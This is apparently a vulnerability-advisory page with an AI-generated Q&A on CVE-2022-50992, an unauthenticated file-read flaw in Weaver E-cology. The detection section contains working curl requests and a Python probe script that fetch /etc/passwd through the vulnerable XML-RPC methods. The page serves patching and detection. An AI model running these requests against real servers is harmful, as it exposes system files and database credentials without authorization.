CVE-2022-50992
Status: Deferred - Pending Action
Arbitrary File Read in Weaver E-cology 9.5

Publication date: 2026-04-30

Last updated on: 2026-04-30

Assigner: VulnCheck

Description
Weaver (Fanwei) E-cology 9.5 versions prior to 10.52 contain an arbitrary file read vulnerability in the XmlRpcServlet interface at the XML-RPC endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying file paths to the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods. Attackers can exploit these methods without authentication to retrieve sensitive files including system configuration files and database credentials from the server. Exploitation evidence was first observed by the Shadowserver Foundation on 2022-12-14 (UTC).
Meta Information
Generated: 2026-05-06
AI Q&A: 2026-04-30
EPSS Evaluated: 2026-05-05
External references: NVD, EUVD
Affected Vendors & Products
Vendor: weaver; Product: e-cology; Version range: up to 10.52 (excluding 10.52)
CWE-22: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2022-50992 is an unauthenticated arbitrary file read vulnerability found in Weaver (Fanwei) E-cology versions prior to 10.52. It exists in the XmlRpcServlet interface at the XML-RPC endpoint, specifically in the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods.

This vulnerability allows remote attackers to read arbitrary files on the server without needing to authenticate by supplying file paths to these methods.

Attackers can exploit this flaw to retrieve sensitive files such as system configuration files and database credentials, potentially compromising the server.


How can this vulnerability impact me?

This vulnerability can have serious impacts as it allows unauthenticated remote attackers to access sensitive files on the affected server.

  • Exposure of system configuration files which may reveal internal system details.
  • Disclosure of database credentials that could lead to further unauthorized access or data breaches.

Such unauthorized access can compromise the confidentiality and security of the affected system and its data.


What immediate steps should I take to mitigate this vulnerability?

To mitigate the CVE-2022-50992 vulnerability in Weaver E-cology versions prior to 10.52, you should immediately upgrade your system to version 10.52 or later, where the vulnerability has been patched.

Before upgrading, ensure you perform offsite and off-media backups of your applications and databases.

After upgrading, follow any post-upgrade instructions such as accessing specific URLs to initialize data as required by the update.

Additionally, restrict the ports the server exposes to the internet to those the application actually needs (the Weaver guidance names 80, 89 and 8088), and never expose remote administration ports such as 3389 (RDP) and 22 (SSH) to the internet.

Verify the integrity of downloaded patches by checking the MD5 checksums Weaver publishes; MD5 is not collision-resistant, so if a SHA-256 checksum is also offered, prefer that one.

If your system uses microservices like ESearch, restrict access to sensitive ports (e.g., 8099, 2098, 8090, 9300, 20981) to prevent internet exposure.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows unauthenticated remote attackers to read arbitrary files, including sensitive system configuration files and database credentials. This exposure of sensitive information could lead to unauthorized access to personal or protected data, potentially violating data protection regulations such as GDPR and HIPAA.

Since attackers can retrieve sensitive files without authentication, organizations using affected versions of Weaver E-cology may face increased risk of data breaches, which can result in non-compliance with standards requiring confidentiality and integrity of personal and sensitive information.

Mitigation through patching (upgrading to version 10.52 or later) and following security best practices as outlined in Weaver's security updates is critical to maintaining compliance and reducing the risk of regulatory penalties.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by attempting to access the XmlRpcServlet interface on Weaver E-cology versions prior to 10.52, specifically targeting the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods to see if arbitrary files can be read without authentication.

A practical detection approach involves sending crafted HTTP requests to the XML-RPC endpoint to check if the server responds with file contents when file paths are supplied to these methods. Note that the method name travels in the POST body, so ordinary web-server access logs only show a POST to the XML-RPC endpoint, not which method was called; retrospective detection of exploitation needs a WAF, reverse-proxy or packet-capture source that records request bodies.

Example commands using curl to test for the vulnerability might include:

  • curl -X POST -H "Content-Type: text/xml" --data '<methodCall><methodName>WorkflowService.getAttachment</methodName><params><param><value><string>/etc/passwd</string></value></param></params></methodCall>' http://target-server/XmlRpcServlet
  • curl -X POST -H "Content-Type: text/xml" --data '<methodCall><methodName>WorkflowService.LoadTemplateProp</methodName><params><param><value><string>/etc/passwd</string></value></param></params></methodCall>' http://target-server/XmlRpcServlet

If the server returns the contents of the specified file (e.g., /etc/passwd), it indicates the presence of the vulnerability. An XML-RPC fault, an HTTP error or an HTML page instead means either a patched build or a different servlet path for that deployment, so confirm the path before treating a negative result as "not vulnerable", and only run these probes against systems you are authorized to test.
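The curl commands above leave it to the operator to eyeball the reply. The following script, an added example that is not part of the advisory and not code from Weaver, builds the same two XML-RPC calls with the standard library, sends them, and classifies the reply automatically. It assumes the servlet path /XmlRpcServlet exactly as the page shows it (adjust for your deployment), and it assumes, since the advisory does not say, that a successful read comes back either as a plain XML-RPC string or base64-encoded; the sample responses at the bottom are constructed for offline checking, not captured from a real server.

```python
"""Probe and response-classification helpers for the CVE-2022-50992 check.

Added example; not code from the advisory or from Weaver. Assumptions are
marked in comments: the servlet path "/XmlRpcServlet" is taken from the page
and may differ per deployment, and the response format (the file as a plain
XML-RPC string or base64-encoded) is not stated by the advisory.
"""
import base64
import binascii
import re
import xmlrpc.client
from urllib.request import Request, urlopen
from xml.parsers.expat import ExpatError

# The two methods named in the advisory.
METHODS = ("WorkflowService.getAttachment", "WorkflowService.LoadTemplateProp")

# Marker proving /etc/passwd came back; pass another pattern for other files.
PASSWD_MARKER = re.compile(rb"^root:x:0:0:", re.MULTILINE)


def build_probe(method: str, path: str) -> bytes:
    """Serialise a methodCall with the file path as its single string parameter."""
    return xmlrpc.client.dumps((path,), methodname=method).encode("utf-8")


def extract_candidates(response_body: bytes) -> list:
    """Return the byte strings a methodResponse might be carrying the file in.

    A Fault, a non-XML-RPC reply (HTML error page, empty body) or a response
    without a string value yields [] so the caller treats it as "not readable".
    """
    try:
        params, _ = xmlrpc.client.loads(response_body.decode("utf-8", "replace"))
    except (xmlrpc.client.Fault, xmlrpc.client.ResponseError, ExpatError):
        return []
    if not params:
        return []
    value = params[0]
    if isinstance(value, xmlrpc.client.Binary):  # <base64> element
        return [value.data]
    if not isinstance(value, str):
        return []
    raw = value.encode("utf-8")
    candidates = [raw]
    # Assumption: the endpoint may base64-encode attachment bytes inside a
    # <string>; validate=True makes plain text such as "root:x:0:0" fail fast.
    try:
        candidates.append(base64.b64decode(raw, validate=True))
    except (binascii.Error, ValueError):
        pass
    return candidates


def looks_like_file(response_body: bytes, marker=PASSWD_MARKER) -> bool:
    """True when the response carries content matching the expected file marker."""
    return any(marker.search(c) for c in extract_candidates(response_body))


def probe(base_url: str, path: str = "/etc/passwd", servlet: str = "/XmlRpcServlet",
          timeout: float = 10.0) -> dict:
    """POST both method calls and report, per method, whether the file came back.

    Network code; not exercised by the offline samples below. Only run against
    systems you are authorised to test.
    """
    results = {}
    for method in METHODS:
        req = Request(base_url.rstrip("/") + servlet, data=build_probe(method, path),
                      headers={"Content-Type": "text/xml"}, method="POST")
        try:
            with urlopen(req, timeout=timeout) as resp:
                results[method] = looks_like_file(resp.read())
        except Exception as exc:  # HTTPError, URLError, timeout: record, keep going
            results[method] = "error: %s" % exc
    return results


# Constructed sample responses (not captured from a real server) for offline checks.
SAMPLE_PLAIN = xmlrpc.client.dumps(
    ("root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1::/usr/sbin:/usr/sbin/nologin\n",),
    methodresponse=True).encode("utf-8")
SAMPLE_B64 = xmlrpc.client.dumps(
    (base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode("ascii"),),
    methodresponse=True).encode("utf-8")
SAMPLE_FAULT = xmlrpc.client.dumps(
    xmlrpc.client.Fault(1, "file not found"), methodresponse=True).encode("utf-8")
SAMPLE_HTML = b"<html><body>HTTP 404 Not Found</body></html>"

if __name__ == "__main__":
    for name, body in [("plain", SAMPLE_PLAIN), ("base64", SAMPLE_B64),
                       ("fault", SAMPLE_FAULT), ("html", SAMPLE_HTML)]:
        print(name, looks_like_file(body))
```

Against a live host you would call probe("http://target-server") and get a dict keyed by method name; a True for either method is a positive finding, an "error: ..." string usually means the servlet path is wrong for that deployment, and False for both means the server answered in XML-RPC but returned no file content, which is the expected result on 10.52 or later.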

